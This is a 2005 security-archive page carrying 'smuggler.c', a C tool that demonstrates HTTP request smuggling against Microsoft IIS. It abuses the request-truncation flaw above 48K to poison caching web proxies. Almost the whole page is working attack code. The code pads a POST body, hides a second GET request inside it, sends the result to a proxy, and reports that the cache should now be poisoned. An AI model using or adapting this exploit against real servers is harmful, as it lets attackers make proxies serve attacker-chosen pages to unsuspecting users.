what you don't know can hurt you

smuggler.c

smuggler.c
Posted Nov 30, 2005
Authored by Andy Davis - IRMPLC

Smuggler demonstrates HTTP Request Smuggling techniques. Currently it only demonstrates the Microsoft IIS greater than 48K Request Truncation flaw in order to poison caching web proxies.

tags | tool, web
systems | unix
MD5 | 2e18d3de586a1bfdef603614c3670515

smuggler.c

Change Mirror Download
/*
Smuggler v0.1, Andy Davis, Information Risk Management 2005
Demonstrates HTTP Request Smuggling - Web Cache Poisoning

This code is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This code is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
Or, point your browser to http://www.gnu.org/copyleft/gpl.html
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32")


void usage (void);
int send_packet (unsigned char * PacketBuf, unsigned char * ProxyIP, unsigned char * ProxyPort);


void main(int *argc, char **argv)
{

unsigned char * TargetIP;
unsigned char * ProxyIP;
unsigned char * ProxyPort;
unsigned char * POSTPage;
unsigned char * PageToPoison;
unsigned char * PoisoningPage;
unsigned char ContentLength[6];
unsigned char FinalBuf[50000];
unsigned char BodyBuf[49200];
unsigned char buf1[] = "POST http://\x00";
unsigned char buf2[] = "/";
unsigned char buf3[] = " HTTP/1.1\r\nHost: \x00";
unsigned char buf4[] = "\r\nConnection: keep-alive\r\nContent-Length: \x00";
unsigned char buf6[] = "\r\n\r\n\x00";
unsigned char buf7[] = "\r\n GET /\x00";
unsigned char buf8[] = " HTTP/1.0\r\n\r\n\x00";
unsigned char buf9[] = "GET http://\x00";
unsigned char buf10[] = " HTTP/1.1\r\nHost: \x00";
int ContentLen = 0;

int x = 0;

if (argc < 6)
usage();

memset (BodyBuf,'A',49150);
BodyBuf[49150] = 0;

TargetIP = argv[1];
ProxyIP = argv[2];
ProxyPort = argv[3];
POSTPage = argv[4];
PageToPoison = argv[5];
PoisoningPage = argv[6];

memset (FinalBuf, 0, 50000);

for (x=0; x<50000; x++)
FinalBuf[x] = '\x00';

ContentLen = 49150 + strlen(buf7) + strlen(PoisoningPage) + strlen(buf8) - 5;
itoa (ContentLen, ContentLength, 10);

/* Build HTTP request */

strncpy (FinalBuf, buf1, strlen(buf1));
strncat (FinalBuf, TargetIP, strlen(TargetIP));
strncat (FinalBuf, buf2, strlen(buf2));
strncat (FinalBuf, POSTPage, strlen(POSTPage));
strncat (FinalBuf, buf3, strlen(buf3));
strncat (FinalBuf, TargetIP, strlen(TargetIP));
strncat (FinalBuf, buf4, strlen(buf4));
strncat (FinalBuf, ContentLength, strlen(ContentLength));
strncat (FinalBuf, buf6, strlen(buf6));
strncat (FinalBuf, BodyBuf, strlen(BodyBuf));
strncat (FinalBuf, buf7, strlen(buf7));
strncat (FinalBuf, PoisoningPage, strlen(PoisoningPage));
strncat (FinalBuf, buf8, strlen(buf8));
strncat (FinalBuf, buf9, strlen(buf9));
strncat (FinalBuf, TargetIP, strlen(TargetIP));
strncat (FinalBuf, buf2, strlen(buf2));
strncat (FinalBuf, PageToPoison, strlen(PageToPoison));
strncat (FinalBuf, buf10, strlen(buf10));
strncat (FinalBuf, TargetIP, strlen(TargetIP));
strncat (FinalBuf, buf6, strlen(buf6));

send_packet (FinalBuf, ProxyIP, ProxyPort);
}


void usage (void)
{
printf ("\n---------------------------------------------------\n");
printf ("smuggler v0.1 - The HTTP Request Smuggling tool\n");
printf ("Andy Davis, IRM plc 2005\n");
printf ("---------------------------------------------------\n\n");
printf ("Usage: smuggler <web server address> <proxy server address> <proxy server port> <POST ASP script> <page to poison> <poisoning page> \n\n");
exit (1);
}


int send_packet (unsigned char * PacketBuf, unsigned char * TargetIP, unsigned char * ProxyPort)
{

int bytesSent;
int bytesRecv = SOCKET_ERROR;
char recvbuf[100];
SOCKADDR_IN clientService;
SOCKET ConnectSocket;
WSADATA wsaData;

int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
if (iResult != NO_ERROR)
printf("Error at WSAStartup()\n");

ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (ConnectSocket == INVALID_SOCKET)
{
printf("Error at socket(): %ld\n", WSAGetLastError());
WSACleanup();
exit (-1);
}

clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr(TargetIP);
clientService.sin_port = htons(atoi(ProxyPort));

if ( connect( ConnectSocket, (SOCKADDR*) &clientService, sizeof(clientService) ) == SOCKET_ERROR)
{
printf( "Error: socket(): %ld\n", WSAGetLastError());
WSACleanup();
exit (-1);
}

printf ("\nSending smuggled request.....");
bytesSent = send( ConnectSocket, PacketBuf, strlen(PacketBuf), 0 );

if (bytesSent > 0)
{
printf ("request sent successfully\n");
printf ("Please wait.....\n");
}
else
{
printf ("\nSend failed.\n\n");
}

while( bytesRecv == SOCKET_ERROR )
{
bytesRecv = recv( ConnectSocket, recvbuf, 32, 0 );
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf( "Connection Closed.\n");
break;
}
printf ("The web cache should now be poisoned\n\n");
}

WSACleanup();
return 0;
}


Login or Register to add favorites

File Archive:

April 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    17 Files
  • 2
    Apr 2nd
    2 Files
  • 3
    Apr 3rd
    2 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    15 Files
  • 7
    Apr 7th
    20 Files
  • 8
    Apr 8th
    16 Files
  • 9
    Apr 9th
    5 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    4 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close